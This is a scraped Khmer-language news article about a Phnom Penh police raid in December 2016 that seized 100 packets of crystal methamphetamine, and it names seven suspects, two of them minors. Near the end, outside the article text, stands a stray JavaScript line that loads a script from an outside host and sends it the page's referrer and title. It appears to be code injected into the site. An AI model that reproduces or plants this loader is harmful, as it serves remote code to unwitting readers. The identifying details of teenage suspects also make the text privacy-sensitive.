Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

Update:សមត្ថកិច្ចខណ្ឌឬស្សីកែវបង្ក្រាបគ្រឿងញៀនលើផ្ទៃទឹក​​ ដកហូតបានថ្នាំញៀន១០០កញ្ចប់

ភ្នំពេញ៖ជនសង្ស័យចំនួន៧នាក់​ ត្រូវបានកម្លាំងសមត្ថកិចុ្ចខណ្ឌឬស្សីកែវឃាត់ខ្លួន ដោយដកហូតបានថ្នាំញៀនមួយចំនួនធំរួមនឹងឧបករណ៏មួយចំនួន ក្នុងរង្វង់ប្រតិបត្តិការណ៌២ ផ្សេងគ្នា នៃការចុះបង្ក្រាបករណីគ្រឿងញៀនកាលពីរសៀលថ្ងៃទី២៤ខែធ្នូឆ្នាំ២០១៦ នៅចំនុចទីតាំងមិនរៀប រយលើផ្ទៃទឹកស្ថិតក្នុងភូមិលូ និងភូមិឡកំបោ ក្នុងសង្កាត់ស្វាយប៉ាក ខណ្ឌឬស្សីកែវ។

លោកម៉ៅ ចាន់ថុន នាយផ្នែកគ្រឿងញៀនខណ្ឌឬស្សីកែវបានអោយដឹងថា ជនសង្ស័យដែល​សមត្ថកិច្ច​បាន​ឃាត់ខ្លួននោះទី១ឈ្មោះហុង ឆេងពៅ អាយុ៣៩ឆ្នាំ មុខរបរជាងសំណង់ ស្នាក់នៅក្នុងសង្កាត់ស្វាយប៉ាក ខណ្ឌឬស្សីកែវ ទី២ឈ្មោះវេង កុងយិន អាយុ៣៦ឆ្នាំ មុខរបរធ្វើជាងកង្ហារ ស្នាក់ភូមិផ្សារលិច សង្កាត់ព្រែព្នៅ​ ខណ្ឌព្រែកព្នៅ ទី៣ឈ្មោះអី លូ អាយុ១៦ឆ្នាំ មុខរបរមិនពីតប្រាកដ ស្នាក់នៅគីឡូ៩​ក្នុងសង្កាត់ច្រាំងចំរេះ១ ខណ្ឌឬស្សីកែវ និងម្នាក់ទៀតឈ្មោះស្រីពៅ អាយុ១៧ឆ្នាំ​មុខរបរធ្វើការរោងចក្រ​ស្នាក់នៅគីឡូ៦ ក្នុងសង្កាត់គីឡូម៉ែត្រលេខ៦ខណ្ឌឬស្សីកែវ។ចំនែក៣នាក់ផ្សេងទៀតសមត្ថកិច្ចកំពុងសាកសួរសាវតាជាតិ។

នាយផ្នែកគ្រឿងញៀនខណ្ឌឬស្សីកែវរូបនេះ បានបន្តអោយដឹងថានៅក្នុងរង្វង់ប្រិតិបត្តិការណ៏ខាងលើនេះដែរសមត្ថកិច្ចបានដកហូតថ្នាំញៀនមេតំហ្វេតាមីនប្រភេទម៉ាទឹកកកចំនួន១០០កញ្ចប់ ក្នុងនោះធំចំនួន៥កញ្ចប់ និងឧបករណ៏គ្រឿងញៀនមួយចំនួនធំទៀតផងដែរ។

បច្ចុប្បន្នជនសង្ស័យទាំងនោះត្រូវបានកម្លាំងជំនាញបញ្ជូនមកកាន់អធិការដ្ឋាន ដើម្បីរៀបចំកសាងសំណុំរឿង​បញ្ជូនទៅតុលាការដើម្បីចាត់ការទៅការតាមផ្លូវច្បាប់៕

គួររំលឹកផងដែរថាកាលពីប៉ុន្មានថ្ងៃមុនក្នុងថ្ងៃទី២១ខែធ្នូទើបកន្លងទៅថ្មីៗ ក្នុងសង្កាត់ស្វាយប៉ាកនេះ កម្លាំងអធិការដ្ឋានខណ្ឌឬស្សីកែវសហការនិងនគរបាលប៉ុស្តិ៏ទើបចុះបង្ក្រាបករណីគ្រឿងញៀនបានមុខសញ្ញាម្នាក់ដកហូតថ្នាំញៀនបានចំនួន២១កញ្ចប់៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More